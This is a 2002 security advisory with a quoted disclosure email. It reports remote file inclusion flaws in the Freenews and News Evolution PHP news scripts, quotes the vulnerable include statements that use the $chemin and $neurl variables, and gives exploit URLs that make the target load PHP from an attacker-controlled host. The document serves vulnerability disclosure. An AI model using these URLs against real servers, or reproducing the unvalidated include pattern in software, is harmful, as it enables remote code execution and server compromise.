Freenews Forum Software Include File Bug Lets Remote Users Execute Arbitrary Commands on the System
|
|
SecurityTracker Alert ID: 1005717 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2.1
|
Description: An include file vulnerability was reported in Freenews. A remote user can execute arbitrary commands on the server.
It is reported that the 'aff_news.php' module contains several include statements that allow a remote user to specify a remote location
for the include file. The statements are shown below:
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include
("$chemin/freenews_functions.inc.php");
A remote user can create arbitrary PHP code and locate it on a remote server. Then,
the remote user can issue a specially crafted URL to the target server that specifies the remote PHP code for inclusion.
A demonstration
exploit URL is provided:
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker
]/freenews_functions.inc.php
|
Impact: A remote user can execute arbitrary commands on the system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.prologin.fr (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Underlying OS Comments: PHP-based
|
Reported By: "Frog Man" <leseulfrog@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 26 Nov 2002 17:43:49 +0100
From: "Frog Man" <leseulfrog@hotmail.com>
Subject: FreeNews & News Evolution (PHP)
|
Informations :
°°°°°°°°°°°°°°
Problem : Include files
a) -------------------
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
----------------------
b) -------------------
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
----------------------
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
a) freenews 2.1
aff_news.php :
-------------------------------------------------
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-------------------------------------------------
...
b) News Evolution 1.0
aff_news.php :
-------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-------------------------------------
moteur/moteur.php :
--------------------------------------------------
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--------------------------------------------------
export_news.php :
---------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---------------------------------------
...
c) News Evolution 2.0
backend.php :
---------------------------------------------------------
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
---------------------------------------------------------
screen.php :
---------------------------------------------------------
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
---------------------------------------------------------
admin/modules/comment.php :
---------------------------------------------------------
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
---------------------------------------------------------
...
Exploits :
°°°°°°°°°°
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...
b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...
c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
...
Patch :
°°°°°°°
http://www.phpsecure.org
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/NEfree.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpa
ir=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
|
|
